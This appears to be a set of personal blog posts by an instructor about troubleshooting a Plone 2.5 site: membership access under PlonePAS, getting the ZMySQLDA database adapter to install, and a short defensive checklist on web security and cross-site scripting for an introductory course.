I have been trying to convert my course website code to work with the new Plone 2.5.2 install. Typically, new features aren’t documented clearly or at all. The biggest hangup is the PlonePAS setup, that has changed the way membership data is accessed. No longer do portal_membership calls work, or at least not completely.  For example, context.portal_membership.listMemberIds() works, but only for the users defined in the default member plugin. I use SQLPASPlugin, and the above code does not list members defined in an SQL database.

The only way I’ve been able to get access to them programmatically is to use context.acl_users.X which I am not sure is the right way. Some test code below:

# Test code for new PAS Plugin architecture---NOT hooked into portal_membership
# print "Current User: ",context.portal_membership.getAuthenticatedMember()
# print "Users: ",context.portal_membership.listMemberIds()
# print "Search Users: ",context.portal_membership.searchForMembers(name='staff1')[0].getRoles()
# print "Search Roles: ",context.portal_membership.searchForMembers(roles='cscishstaff')
# print "acl_users: "
# users=context.acl_users.searchUsers(roles='staff')
# for u in users:
#     print "%s(%s)"%(u['userid'],u['title'])
#     print u
# return printed


I had hoped that I was done with installing ZMySQLDA on Plone, but it turns out there were some additional hiccups. ZMySQLDA was being recognized as a product in the Control Panel, but it disappeared from the drop down menu again. Looking at the event.log revealed that it was trying to extract files from an egg file into my personal user home directory, not the “plone” user that was created and under which the plone process was being run. Not exactly sure why this is happening, but I took the lazy way out and manually copied and pasted the MySQLdb folder and _mysql.so file into the Python directory. An added complication was that the _mysql.so had to be also copied into the ZMySQLDA directory.

 I really need to sit down and figure out all this egg and process configuration out, but am running out of time setting up for my summer courses.

I have been ignoring going into details of web security in my introductory web class, partly because we cover so much (HTML, CSS, Javascript, SQL, python) that we really don’t have time to cover it, and partly because I’ve been too busy to come up with some slides for it.

With the prevalence of XSS (Cross Site Scripting) hacks, it looks like this year I will be spending at least a few slides on security.

Some resources:

• http://www.cgisecurity.com/articles/xss-faq.shtml
• http://www.cert.org/tech_tips/cgi_metacharacters.html

An informative post on slashdot outlined a few points to consider when designing a site to be robust against XSS (I’ve highlighted his points, but the words are mostly his):

by Fireflymantis (670938)on Friday June 15, @04:21AM (#19516455)

•  Are you making sure, without fail that if a user changes view.php?id=32 to view.php?id=33 that they are not getting access to content they shouldn’t be?

• What about cookies? Assuming the malicious user can (and will) build cookies of their choosing and content, are you making sure that this cannot somehow be used to hijack another users account?
• Are you 100% certain, that every time you read get/post/put data that it has been marked as tainted, validated, and only after it has made it through some very harsh sanity checks it is allowed any where /close/ to a DB insert/query?
• It gets even more muddeled in the world of XmlHttprequests when you have to validate against a plethora of other constraints
• Simply checking form data is almost 99% of the time not enough. For a non-trivial web app, even the above is not easy to do unless you pay attention to it every step of development. And even if you do that, you will probabaly miss something.

I’ve just spent the last 2 hours or so installing ZMySQLDA on a Plone 2.5.3 site. It was considerably more painful than I thought, as I never used to have troubles with this product before.

The problem? PIL is required to be installed for Plone, and its ImageFile package conflicts with a similarly named package that is part of Zope (App.ImageFile)

 This is fixed in the DA.py file of ZMySQLDA by explicitly importing the App.ImageFile package, not the PIL version.

 After having the ZMySQLDA product finally appear in the Control Panel, it still wasn’t showing up on the drop down “add” menu. I am not sure what I did to fix this, but for a while only a single ZEO client had the menu option visible. Although I had rebooted/restarted the ZEO client/server multuple times and multiple ways (through the control panel and using the restartcluster.sh script) I think I still had the problem.

In anycase, it now works and I have both ZEO clients showing “Add Z MySQL Database Connection.”

I had planned on getting SQLPASPlugin setup, but it is already 1227, and I need to go to bed.